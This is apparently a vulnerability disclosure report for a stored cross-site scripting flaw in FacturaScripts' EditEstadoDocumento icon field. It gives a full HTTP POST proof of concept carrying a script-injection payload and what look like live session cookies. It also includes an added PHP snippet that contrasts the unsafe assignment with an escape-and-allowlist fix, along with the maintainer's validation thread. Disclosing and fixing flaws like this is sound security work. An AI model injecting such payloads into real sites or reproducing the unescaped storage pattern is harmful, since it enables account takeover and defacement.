Stored XSS in EditEstadoDocumento in neorazorx/facturascripts

Valid

Reported on

Jun 21st 2022


Description

In facturascripts/EditEstadoDocumento, an XSS payload can be injected into the Icon field; the value is stored and later rendered back into the page without escaping.

Proof of Concept

// PoC.js
POST /facturascripts/EditEstadoDocumento?code=27&action=save-ok HTTP/1.1
Host: 127.0.0.1
Content-Length: 1224
Cache-Control: max-age=0
sec-ch-ua: "-Not.A/Brand";v="8", "Chromium";v="102"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "macOS"
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryyI8BCGNBzwLmaAy8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1/facturascripts/EditEstadoDocumento?code=26&action=save-ok
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: fsNick=admin; fsLogkey=hMNEoHuTcDfqZY9OK5b8tG7SW4pUliLFrQkdaBxjCzmJR6gXPnAse2I0Vwy13v; fsLang=en_EN; fsCompany=1; MANTIS_STRING_COOKIE=074c946191216c6d308b8d38e9569cfdef504077558ca4e138964772efb3b87f; MANTIS_PROJECT_COOKIE=0; ucp_tabs=2; __stripe_mid=31234598-f1c7-427c-b5cd-9312a98b0b98b9519b; cookie_token=1c39db291b76e38db9e55ed6f02a77b65ae952140787ee0282a0f7880a7935ca; cpg16x_data=YTo2OntzOjI6IklEIjtzOjMyOiI0MmNlNzEwM2M5OTM5NDNjYTIwMDM2YmRkYmM2NTMxOSI7czoyOiJhbSI7aTowO3M6NDoibGFuZyI7czoxMDoiY2hpbmVzZV9nYiI7czo2OiJzZWFyY2giO2E6Mjp7czo2OiJwYXJhbXMiO2E6Njp7czo4OiJrZXl3b3JkcyI7czoyOiJvbiI7czo1OiJ0aXRsZSI7czoyOiJvbiI7czo3OiJjYXB0aW9uIjtzOjI6Im9uIjtzOjQ6InR5cGUiO3M6MzoiQU5EIjtzOjEwOiJuZXdlcl90aGFuIjtzOjA6IiI7czoxMDoib2xkZXJfdGhhbiI7czowOiIiO31zOjY6InNlYXJjaCI7czozOiJzdmciO31zOjM6ImxpdiI7YToxOntpOjA7czoyOiI4NSI7fXM6MTM6InVwbG9hZF9tZXRob2QiO3M6MTA6InVwbG9hZF9zZ2wiO30%3D; elggperm=zG9jJWU92GZ03ft0yoDFuZ0zhBSb9YvA; Elgg=eftlmmmmdr4oamet41e1le100e
Connection: close

------WebKitFormBoundaryyI8BCGNBzwLmaAy8
Content-Disposition: form-data; name="action"

insert
------WebKitFormBoundaryyI8BCGNBzwLmaAy8
Content-Disposition: form-data; name="activetab"

EditEstadoDocumento
------WebKitFormBoundaryyI8BCGNBzwLmaAy8
Content-Disposition: form-data; name="code"


------WebKitFormBoundaryyI8BCGNBzwLmaAy8
Content-Disposition: form-data; name="multireqtoken"

5ebd6335e1917c1e3191a32f6b4be8fd9a5d8c71|1VDJp6
------WebKitFormBoundaryyI8BCGNBzwLmaAy8
Content-Disposition: form-data; name="idestado"


------WebKitFormBoundaryyI8BCGNBzwLmaAy8
Content-Disposition: form-data; name="nombre"

33
------WebKitFormBoundaryyI8BCGNBzwLmaAy8
Content-Disposition: form-data; name="tipodoc"

PresupuestoCliente
------WebKitFormBoundaryyI8BCGNBzwLmaAy8
Content-Disposition: form-data; name="actualizastock"

33
------WebKitFormBoundaryyI8BCGNBzwLmaAy8
Content-Disposition: form-data; name="generadoc"


------WebKitFormBoundaryyI8BCGNBzwLmaAy8
Content-Disposition: form-data; name="icon"

'"><script>alert(/xss/);</script><'"2
------WebKitFormBoundaryyI8BCGNBzwLmaAy8
Content-Disposition: form-data; name="editable"

TRUE
------WebKitFormBoundaryyI8BCGNBzwLmaAy8--

Impact

This vulnerability has the potential to deface websites, result in compromised user accounts, and can run malicious code on web pages, which can lead to a compromise of the user’s device.

Occurrences

$this->icon = $this->toolBox()->utils()->noHtml($this->icon);
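Added example, not FacturaScripts code: it shows the escape-on-save pattern the merged fix applies to the icon field next to the unsafe assignment it replaced, plus a stricter allowlist check as an extra hardening step. The class, method names and the assumption that an icon is only ever a CSS class list such as "fas fa-check" are illustrative, not the project's real API.

```php
<?php
declare(strict_types=1);

// Same approach as the fix: escape the characters that can close an attribute
// or open a tag, so the stored value is inert when rendered into HTML.
// (Assumed to mirror noHtml(); not the project's own implementation.)
function noHtml(?string $txt): string
{
    $from = ['<', '>', '"', "'"];
    $to   = ['&lt;', '&gt;', '&quot;', '&#39;'];
    return trim(str_replace($from, $to, $txt ?? ''));
}

// Stricter addition (assumption: icons are CSS class lists like "fas fa-check"):
// accept only letters, digits, single spaces and hyphens, reject everything else.
function isValidIconClass(string $icon): bool
{
    return (bool) preg_match('/^[a-z0-9]+(?:[ -][a-z0-9]+)*$/i', $icon);
}

final class EstadoDocumentoExample
{
    public ?string $icon = null;

    // Vulnerable version: the form value is stored exactly as submitted.
    public function setIconUnsafe(string $icon): void
    {
        $this->icon = $icon;
    }

    // Hardened version: validate against the allowlist, then escape anyway as
    // defence in depth; returns false so the caller can refuse the save.
    public function setIconSafe(string $icon): bool
    {
        if (!isValidIconClass($icon)) {
            return false;
        }
        $this->icon = noHtml($icon);
        return true;
    }
}

// Constructed inputs: the payload from the PoC above and a legitimate icon.
$payload = "'\"><script>alert(/xss/);</script><'\"2";
$state = new EstadoDocumentoExample();
$state->setIconUnsafe($payload);
echo "unsafe: {$state->icon}\n";                 // markup stored verbatim
echo "reject: " . var_export($state->setIconSafe($payload), true) . "\n";
echo "accept: " . var_export($state->setIconSafe('fas fa-check'), true) . "\n";
echo "safe:   {$state->icon}\n";
```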

We are processing your report and will contact the neorazorx/facturascripts team within 24 hours. 5 days ago
Carlos Garcia validated this vulnerability 5 days ago
i0hex has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Carlos Garcia confirmed that a fix has been merged on 6b03dc 5 days ago
The fix bounty has been dropped
EstadoDocumento.php#L141 has been validated
i0hex
2 days ago

Researcher


@admin Hey, may I have a CVE?

Jamie Slome
2 days ago

Admin


@iohehe - we can proceed with a CVE if the maintainer is happy to do so :)
